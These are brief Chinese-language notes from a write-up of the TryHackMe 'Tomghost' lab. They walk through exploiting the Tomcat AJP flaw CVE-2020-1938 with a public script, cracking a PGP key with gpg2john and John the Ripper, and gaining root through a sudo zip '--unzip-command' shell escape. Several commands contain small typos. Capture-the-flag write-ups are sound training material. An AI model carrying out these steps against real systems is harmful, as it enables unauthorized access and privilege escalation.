!!!
Tomghost
Identify recent vulnerabilities to try exploit the system or read files that you should not have access to.
bilibili
https://www.bilibili.com/video/BV13G4y1B7WT
信息搜索
扫下端口
扫描目录,不过没什么收获
我们搜下tomcat 9.0.30
找到漏洞
CVE-2020-1938
CVE-2020-1938
- Apache Tomcat 9.x < 9.0.31
- Apache Tomcat 8.x < 8.5.51
- Apache Tomcat 7.x < 7.0.100
- Apache Tomcat 6.x
exphub/tomcat at master · zhzyker/exphub (github.com)
python2 ./p.py 10.10.106.85
直接利用
拿到skyfuck权限
我们看到加密文件,尝试解密下
convert
ASC文件是加密软件PGP(Pretty Good Privacy)
gpg2john ——— .asc
复制tryhackme.asc到kali改名1.asc
gpg2john 1.asc > 1
john –wordlist=rockyou.txt 1
然后得到密钥
gpg -import tryhackme.asc
gpg - -decrypt credential.pgp
sodo -l
touch 1.txt
sudo zip 1.zip 1.txt -T --unzip-command="sh -c /bin/bash"
linux zip 提权YouthBelief的博客-CSDN博客zip提权
!!!